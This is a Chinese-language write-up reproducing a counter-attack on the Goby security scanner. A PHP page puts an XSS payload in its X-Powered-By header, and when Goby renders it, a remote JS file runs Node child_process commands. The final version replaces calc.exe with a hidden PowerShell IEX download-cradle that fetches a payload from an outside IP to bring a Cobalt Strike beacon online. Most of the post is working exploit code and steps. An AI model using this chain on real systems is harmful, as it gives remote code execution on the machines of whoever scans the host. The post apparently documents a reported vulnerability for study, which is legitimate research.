0x00 前言
最近复现Goby反制的时候遇到很多坑,记录一下反制过程以及遇到的坑点,还有世界上最强的黑客mux1ng帮我解决了很多问题。
0x01环境
攻击机:
windows10
Goby1.8.230
172.20.10.3反制机:
Windows7
Phpstudy2016
172.20.10.14
0x02步骤
1、再反制机上开启一个php服务,然后制作一个index.php页面,img标签里的空格要用tab去代替
index.php内容:
<?php
header("X-Powered-By: PHP/<img src=1 onerror=alert(/s/)>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>
2、通过攻击机上的goby去扫描,然后点开该IP的详细即可弹窗
3、接下来就可以通过加载js来执行命令了,制作1.js文件
index.php内容改成
<?php
header("X-Powered-By: PHP/<img src=1 onerror=import(unescape('http%3A//172.20.10.14/1.js'))>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>1.js内容为
(function(){
require('child_process').exec('calc.exe');
})();
4、更改完index.php和1.js之后,再次使用goby去扫描该IP,点开详情后可弹计算机出来
5、最后就吧calc.exe替换cs上线的命令即可上线cs了
index.php内容改成
<?php
header("X-Powered-By: PHP/<img src=1 onerror=import(unescape('http%3A//172.20.10.14/1.js'))>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>1.js内容为
(function(){
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://43.129.206.184:80/a\'))"');
})();
0x03遇到的问题
1、使用phpstudy启动的时候一定要选择nginx+php
2、当更改完1.js内容之后一定要关闭goby,然后重新再打开goby去扫描,因为goby有缓存,所以不重新打开可能不会加载1.js
3、require('child_process').exec()里的上线cs命令的时候一定要用反斜杠(\)要把单引号给转义一下,不然上线cs可能有点问题
)
)
漏洞复现)
)
